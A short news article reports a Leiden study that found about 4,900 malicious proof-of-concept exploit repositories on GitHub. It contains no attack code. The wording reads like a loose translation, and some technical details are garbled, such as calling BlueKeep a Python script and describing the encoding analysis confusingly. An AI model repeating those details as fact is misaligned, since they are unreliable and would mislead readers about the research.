On the GitHub code hosting network, a team of researchers discovered nearly 4,900 projects that incorporate proof-of-concept (PoC) “exploits” that can download files containing “malware.”
Programmers and developers publish these PoCs on the GitHub platform for their community to download and use to validate vulnerability fixes or assess the severity or reach of a security mistake.
47,313 GitHub repositories with PoC on vulnerabilities discovered between 2017 and 2021 were examined by researchers at the Institute for Advanced Computer Science in Leiden, the Netherlands.
An extensive analysis of data, including the IP addresses of the repositories, binary analysis, hexadecimal encoding (which is used to know the malicious payloads), and base64, which searches for hidden’scripts’ to find connections to external IPs, is required to ascertain whether these PoCs are malicious.
According to the research article, a total of 4,893 of the assessed repositories were deemed malicious (representing 10.3 percent of the total), and the majority of them made reference to 2020 vulnerabilities.
They emphasize in the paper text that “this rate of unreliable exploits is rather concerning, as they are being exploited by people all over the world.”
It also suggests that a significant volume of malware and harmful scripts were discovered by the researchers. Some of these include the JavaScript-based Trojan Houdini and the Python “script” BlueKeep that is part of the Proof of Concept for vulnerability CVE-2019-0708.
The requirement for developing more reliable detection methods has been recognized by researchers who have reported these vulnerabilities to GitHub. They have, however, made it clear that they are aware of how challenging it is to fully automate the detection procedure in order to stop upcoming attacks.